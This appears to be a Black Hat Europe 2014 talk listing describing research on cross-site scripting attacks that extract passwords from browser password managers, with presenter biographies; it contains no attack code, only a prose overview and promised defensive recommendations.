Presented at
Black Hat Europe 2014,
Oct. 17, 2014, 10:15 a.m.
(60 minutes).
Ever since Cross-site Scripting (XSS) was discovered in the year 2000, one of the main goals of an XSS attack was to take over the victim's session, and, thus his authentication context with the vulnerable web application. Consequently, the terms "XSS" and "Session Hijacking" were used as synonyms for many years. However, the introduction of defensive features, such as HTTPonly Cookies, efficiently prevents the stealing of session IDs and mitigating this class of attacks. However, while session identifiers are protected robustly, another more powerful and much more long-lived authentication credential might not be: The Web user's password.
As it turns out, browser-based password managers appear to be the exact tool that attackers need: To ease the burden of repeated password authentication on multiple sites, modern web browsers provide password managers, which offer to automatically complete password fields on web pages, after the password has been stored once. Unfortunately, these managers operate by simply inserting the clear-text password into the document's DOM, where it is accessible by JavaScript.
In consequence, a successful XSS attack can be leveraged by the attacker to read and leak password data which has been provided by the password manager.
In this presentation, we give a comprehensive overview on potential XSS-based attack patterns on browser-provided password managers. In this context, we present two systematic studies:
- For one, we examine the current generation of existing password managers in all (!) major browsers and show their susceptibility to the outlined attacks. We will show in detail how an XSS attack can leak obtain user's password from the manager and leak it to the user.
- Furthermore, we report on a large-scale study on the Alexa Top 4000 site, in which we studied how password fields are used by popular websites.
We will conclude the presentation with a set of recommendations, both for website operators as well as web users, how to protect themselves against the demonstrated attacks.
Presenters:
-
Martin Johns
- SAP AG
Dr. Martin Johns is a Research Expert in the Security and Trust group within SAP AG, where he leads the Web application security team. Furthermore, he serves on the board of the German OWASP chapter.
Before joining SAP, Martin studied Mathematics and Computer Science at the Universities of Hamburg, Santa Cruz (CA), and Passau. During the 1990ties and the early years of the new millennium he earned his living as a software engineer in German companies (including Infoseek Germany, and TC Trustcenter). He holds a Diploma in Computer Science from University of Hamburg and a Doctorate from the University of Passau.
Martin has a track record of 8+ years applied WebAppSec research, published more than 20 papers on the subject, and is a regular speaker at international security conferences, including the OWASP AppSec series, ACSAC, ESORICS, PacSec, HackInTheBox, RSA Europe, or the CCC Congress.
-
Ben Stock
- University Erlangen-Nuremberg
Ben is currently a PhD student and research fellow at the Security Research Group of the University Erlangen-Nuremberg. His research interests lie within Web Security and Malware Analysis and he enjoys the challenges provided in Capture-the-Flag contests.
-
Sebastian Lekies
Sebastian Lekies is a PhD candidate at the University of Bochum. His main field of research is Web application security. Thereby, he mainly foccuses on client-side Web attacks such as Cross-Site Scripting, ClickJacking, DNS-Rebinding, Cross-Site Request Forgery, etc. He regularly publishes his work at academic and non-academic security conferences such as CCS, Usenix Security, OWASP Appsec, Deepsec, etc.
Links:
Similar Presentations: